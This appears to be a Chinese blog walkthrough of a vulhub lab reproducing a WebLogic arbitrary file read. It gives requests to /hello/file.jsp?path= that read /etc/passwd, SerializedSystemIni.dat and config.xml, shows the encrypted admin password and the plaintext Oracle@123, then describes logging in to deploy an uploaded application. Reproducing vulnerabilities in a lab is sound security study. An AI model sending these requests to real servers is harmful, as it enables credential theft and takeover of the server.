漏洞复现(vulhub漏洞复现) weblogic 文件读取漏洞

何以至千里

 关注

阅读 72

2022-04-14

weblogic 文件读取漏洞
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
访问http://192.168.15.136:7001/hello/file.jsp?path=/etc/passwd可见成功读取passwd文件
在这里插入图片描述
在这里插入图片描述
GET /hello/file.jsp?path=security/SerializedSystemIni.dat HTTP/1.1
在这里插入图片描述
是一个二进制文件,所以一定要用burpsuite来读取,用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码,右键copy to file就可以保存成一个文件:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
GET /hello/file.jsp?path=config/config.xml HTTP/1.1
找到其中的的值,即为加密后的管理员密码
在这里插入图片描述
在这里插入图片描述
{AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=
在这里插入图片描述
不知道为啥解不出来 Oracle@123
取到管理员密码后,登录后台。点击左侧的部署,可见一个应用列表
在这里插入图片描述
在这里插入图片描述

点击安装,选择“上载文件”:

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

相关推荐

weblogic漏洞复现

RJ_Hwang 110 0 0

vulhub漏洞复现二十_GitList

开源GIS定制化开发方案 72 0 0

vulhub漏洞复现十五_flask

年迈的代码机器 55 0 0

vulhub漏洞复现七_couchdb

凶猛的小白兔 88 0 0

[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798

蛇发女妖 135 0 0

vulhub Apache HTTPD 多后缀解析漏洞漏洞复现

Xin_So 66 0 0

vulhub漏洞复现60_SaltStack

Separes 83 0 0

vulhub漏洞复现71_Unomi

小飞侠熙熙 59 0 0

vulhub漏洞复现67_Supervisor

芝婵 90 0 0

vulhub漏洞复现64_Solr

茗越 53 0 0

精彩评论(0)

0 0 举报